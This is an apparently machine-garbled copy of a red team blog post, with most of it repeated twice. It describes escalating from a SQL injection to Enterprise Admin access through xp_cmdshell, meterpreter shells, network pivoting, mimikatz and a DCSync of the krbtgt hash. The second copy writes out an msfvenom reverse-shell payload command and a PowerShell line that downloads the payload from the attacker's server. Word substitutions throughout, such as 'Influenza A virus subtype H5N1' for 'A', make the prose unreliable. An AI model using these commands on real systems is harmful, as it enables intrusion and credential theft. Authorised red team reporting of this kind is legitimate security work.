We were of late engaged inwards a Red Team exercise inwards which the exclusively information provided to us was the organisation name. In this spider web log post Sudhanshu Chauhan explores 1 of the exploitation paths which led us to attain Windows Enterprise Admin degree access from a SQL injection vulnerability. The storey has green suspects: OSINT, weak credentials, password cracking, insecure configurations, pivoting, AV bypass in addition to pure pwnage.
As active enumeration was prohibited during the initial phase, nosotros started alongside passive information gathering which included identifying IP ranges owned yesteryear the client, enumerating domains in addition to subdomains, exploring github, pastebin in addition to other sources for leaked sensitive information in addition to service regain using shodan every bit good every bit several other OSINT techniques.
Influenza A virus subtype H5N1 listing of resources was compiled and ranked based on a set out of factors including information similar leaked credentials, outdated software, exposed services etc. from where nosotros prioritised targets that nosotros believed would yield the most results. The listing was in addition to then shared alongside the customer in addition to the targets for adjacent stage were confirmed.
One of the high ranking websites was explored in addition to a SQL injection vulnerability was identified. Using the selection ‘–is-dba’ inwards SQLMap, nosotros identified that nosotros had DB admin degree privileges. Interactive access (sql shell) was gained from where multiple databases were identified. Influenza A virus subtype H5N1 set out of database user accounts in addition to the associated password hashes were besides located. Using #OneRuleToRuleThemAll nosotros were able to scissure a set out of those password hashes. Also, every bit ‘xp_cmdshell’ was enabled on the database server, nosotros were able to execute OS commands. This was confirmed yesteryear OOB DNS Calls to our custom domain “xyz.abc.sos.notsosecure.com”, every bit shown below:
When you lot have got code execution, the adjacent pace is to accomplish improve command via an interactive shell. We fiddled alongside multiple meterpreter payloads, exactly failed on nearly all of them. As nosotros kept experimenting alongside multiple exfiltration techniques such every bit ICMP tunnelling nosotros settled for an interactive ICMP shell through xp_cmdshell, every bit shown below:
Using the newly gained ICMP rhythm out nosotros fiddled alongside the compromised scheme in addition to looked to a greater extent than or less for anything that could assistance us during post-exploitation. The ICMP rhythm out was besides a niggling unstable which wasn’t practiced plenty to quench our post-exploitation thirst.
As the host was a Windows box, nosotros in addition to then tried to larn a powershell meterpreter payload. It got us a rhythm out exactly it was detected inside few seconds in addition to the connector was terminated. Influenza A virus subtype H5N1 niggling enumeration confirmed that at that spot was enterprise safety Antivirus running on the host. After a few failed attempts to circumvent the protection inwards place, nosotros stepped dorsum to enumeration on the host in addition to identified that python was installed. Then nosotros generated a python meterpreter payload using msfvenom yesteryear running the next command:
Although much to a greater extent than stable than our initial ICMP shell, most of the meterpreter commands failed to fetch results. This was because of the limitations of the python meterpreter implementation.
From our newly gained python meterpreter rhythm out nosotros moved on to farther enumeration. Based on our yesteryear sense nosotros targeted network shares, every bit they are oftentimes non included inside Antivirus scanning scope. Luckily, nosotros stumbled across 1 such portion in addition to dropped a Windows non-staged meterpreter payload there. We started some other metasploit multi handler for the non-staged meterpreter payload, executed the binary in addition to every bit expected received a shiny, novel native meterpreter shell.
Once you lot have got a meterpreter shell, the exciting times begin. Now nosotros dumped hashes, tried to fetch clear text passwords using mimikatz, extract delegation tokens exactly nosotros did non have anything which could assistance us larn whatever farther than nosotros already were. No cleartext login credentials were establish every bit no 1 was logged inwards in addition to local hashes were non working anywhere else.
We identified that the host had multiple network interfaces, hence nosotros used our newly gained meterpreter rhythm out to add together a road to the internal network using the next command:
Using an auxiliary metasploit module nosotros in addition to then executed a port scan on the alive hosts to assay in addition to seat whatever hosts running MSSQL, every bit shown below:
We in addition to then used the “auxiliary/scanner/mssql/mssql_login” module alongside database accounts that were cracked before to meet if whatever accounts had been reused, every bit shown below:
We establish 1 occupation organisation human relationship was valid on ii other hosts in addition to had database admin privileges. With the assistance of the module ‘auxiliary/admin/mssql/mssql_exec’, nosotros were able to job this privileged occupation organisation human relationship to larn a meterpreter rhythm out running every bit SYSTEM. This host was running Windows Server 2003 operating scheme (which is directly obsolete). The local hashes were later dumped, in addition to hashcat cracked a bunch of local accounts. The meterpreter rhythm out was in addition to then used to dump domain occupation organisation human relationship hashes every bit shown below:
Apart from that, mimikatz was besides used to dump clear text passwords from the retention of the compromised box every bit shown below:
After farther enumeration it was identified that 1 of these user was job of the “Enterprise Admins” Group. This gave us straight access to Domain Controller. At this betoken nosotros moved towards volume exploitation in addition to using these high privilege credentials nosotros extracted multiple clear text passwords from all other hosts using powershell script “Invoke-MassMimikatz.ps1“.
Additionally nosotros were directly inwards a seat to perform hashdump on the domain controller to obtain hashes of high privilege accounts similar “krbtgt”. Here nosotros used a nifty command called ‘dcsync_ntlm’ from the metasploit kiwi extension to extract the hash of krbtgt account, every bit shown below.
This hash tin in addition to then last farther leveraged to do golden ticket in addition to obtain persistence on the network. This is where nosotros stopped after our long journey, starting from a spider web application vulnerability in addition to ending alongside multiple credentials of enterprise admins.
The entire scenario is demonstrated inwards the laid on menses diagram below:
This compromise life-cycle emphasizes the fact that each private vulnerability should last treated alongside importance every bit nosotros never know when it volition croak a link inwards chained vulnerabilities, leading to full compromise. Another of import aspect for an enterprise is to ensure that a consummate inventory is created of all systems in addition to an acceptable patching in addition to upgrading policy should last inwards place.
<marketing>
Establishing domain persistence oftentimes requires several steps, including both spider web application in addition to infrastructure components every bit shown above. Our Advanced Infrastructure Hacking (AIH) in addition to Basic Web Hacking (BWH) courses, both of which are beingness delivered at Blackhat European Union 2017, render great insight into the identification of laid on vectors similar these in addition to how to exploit them. Further details tin last establish below.
As active enumeration was prohibited during the initial phase, nosotros started alongside passive information gathering which included identifying IP ranges owned yesteryear the client, enumerating domains in addition to subdomains, exploring github, pastebin in addition to other sources for leaked sensitive information in addition to service regain using shodan every bit good every bit several other OSINT techniques.
Influenza A virus subtype H5N1 listing of resources was compiled and ranked based on a set out of factors including information similar leaked credentials, outdated software, exposed services etc. from where nosotros prioritised targets that nosotros believed would yield the most results. The listing was in addition to then shared alongside the customer in addition to the targets for adjacent stage were confirmed.
One of the high ranking websites was explored in addition to a SQL injection vulnerability was identified. Using the selection ‘–is-dba’ inwards SQLMap, nosotros identified that nosotros had DB admin degree privileges. Interactive access (sql shell) was gained from where multiple databases were identified. Influenza A virus subtype H5N1 set out of database user accounts in addition to the associated password hashes were besides located. Using #OneRuleToRuleThemAll nosotros were able to scissure a set out of those password hashes. Also, every bit ‘xp_cmdshell’ was enabled on the database server, nosotros were able to execute OS commands. This was confirmed yesteryear OOB DNS Calls to our custom domain “xyz.abc.sos.notsosecure.com”, every bit shown below:
When you lot have got code execution, the adjacent pace is to accomplish improve command via an interactive shell. We fiddled alongside multiple meterpreter payloads, exactly failed on nearly all of them. As nosotros kept experimenting alongside multiple exfiltration techniques such every bit ICMP tunnelling nosotros settled for an interactive ICMP shell through xp_cmdshell, every bit shown below:
Using the newly gained ICMP rhythm out nosotros fiddled alongside the compromised scheme in addition to looked to a greater extent than or less for anything that could assistance us during post-exploitation. The ICMP rhythm out was besides a niggling unstable which wasn’t practiced plenty to quench our post-exploitation thirst.
As the host was a Windows box, nosotros in addition to then tried to larn a powershell meterpreter payload. It got us a rhythm out exactly it was detected inside few seconds in addition to the connector was terminated. Influenza A virus subtype H5N1 niggling enumeration confirmed that at that spot was enterprise safety Antivirus running on the host. After a few failed attempts to circumvent the protection inwards place, nosotros stepped dorsum to enumeration on the host in addition to identified that python was installed. Then nosotros generated a python meterpreter payload using msfvenom yesteryear running the next command:
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<OUR_HOST> LPORT=1234 > pypreter.pyThe to a higher house payload was in addition to then hosted on our server in addition to nosotros instructed the compromised server to download the payload using the next Powershell command from the ICMP shell:
powershell $WebRequest = New-Object System.Net.WebClient; $WebRequest.DownloadFile('http://<OUR_HOST>:8000/pypreter.py','C:\Windows\Temp\pypreter.py') We started our metasploit multi handler for the python payload in addition to executed the payload through the ICMP shell. Voila! This got us our much desired meterpreter shell, every bit shown below:Although much to a greater extent than stable than our initial ICMP shell, most of the meterpreter commands failed to fetch results. This was because of the limitations of the python meterpreter implementation.
From our newly gained python meterpreter rhythm out nosotros moved on to farther enumeration. Based on our yesteryear sense nosotros targeted network shares, every bit they are oftentimes non included inside Antivirus scanning scope. Luckily, nosotros stumbled across 1 such portion in addition to dropped a Windows non-staged meterpreter payload there. We started some other metasploit multi handler for the non-staged meterpreter payload, executed the binary in addition to every bit expected received a shiny, novel native meterpreter shell.
Once you lot have got a meterpreter shell, the exciting times begin. Now nosotros dumped hashes, tried to fetch clear text passwords using mimikatz, extract delegation tokens exactly nosotros did non have anything which could assistance us larn whatever farther than nosotros already were. No cleartext login credentials were establish every bit no 1 was logged inwards in addition to local hashes were non working anywhere else.
We identified that the host had multiple network interfaces, hence nosotros used our newly gained meterpreter rhythm out to add together a road to the internal network using the next command:
route add together 10.0.1.0 255.255.252.0 1Once the road was added, nosotros performed an ARP scan to seat alive hosts on the network using a post exploitation metasploit module in addition to identified multiple hosts.
Using an auxiliary metasploit module nosotros in addition to then executed a port scan on the alive hosts to assay in addition to seat whatever hosts running MSSQL, every bit shown below:
We in addition to then used the “auxiliary/scanner/mssql/mssql_login” module alongside database accounts that were cracked before to meet if whatever accounts had been reused, every bit shown below:
We establish 1 occupation organisation human relationship was valid on ii other hosts in addition to had database admin privileges. With the assistance of the module ‘auxiliary/admin/mssql/mssql_exec’, nosotros were able to job this privileged occupation organisation human relationship to larn a meterpreter rhythm out running every bit SYSTEM. This host was running Windows Server 2003 operating scheme (which is directly obsolete). The local hashes were later dumped, in addition to hashcat cracked a bunch of local accounts. The meterpreter rhythm out was in addition to then used to dump domain occupation organisation human relationship hashes every bit shown below:
Apart from that, mimikatz was besides used to dump clear text passwords from the retention of the compromised box every bit shown below:
After farther enumeration it was identified that 1 of these user was job of the “Enterprise Admins” Group. This gave us straight access to Domain Controller. At this betoken nosotros moved towards volume exploitation in addition to using these high privilege credentials nosotros extracted multiple clear text passwords from all other hosts using powershell script “Invoke-MassMimikatz.ps1“.
Additionally nosotros were directly inwards a seat to perform hashdump on the domain controller to obtain hashes of high privilege accounts similar “krbtgt”. Here nosotros used a nifty command called ‘dcsync_ntlm’ from the metasploit kiwi extension to extract the hash of krbtgt account, every bit shown below.
This hash tin in addition to then last farther leveraged to do golden ticket in addition to obtain persistence on the network. This is where nosotros stopped after our long journey, starting from a spider web application vulnerability in addition to ending alongside multiple credentials of enterprise admins.
The entire scenario is demonstrated inwards the laid on menses diagram below:
This compromise life-cycle emphasizes the fact that each private vulnerability should last treated alongside importance every bit nosotros never know when it volition croak a link inwards chained vulnerabilities, leading to full compromise. Another of import aspect for an enterprise is to ensure that a consummate inventory is created of all systems in addition to an acceptable patching in addition to upgrading policy should last inwards place.
<marketing>
Establishing domain persistence oftentimes requires several steps, including both spider web application in addition to infrastructure components every bit shown above. Our Advanced Infrastructure Hacking (AIH) in addition to Basic Web Hacking (BWH) courses, both of which are beingness delivered at Blackhat European Union 2017, render great insight into the identification of laid on vectors similar these in addition to how to exploit them. Further details tin last establish below.
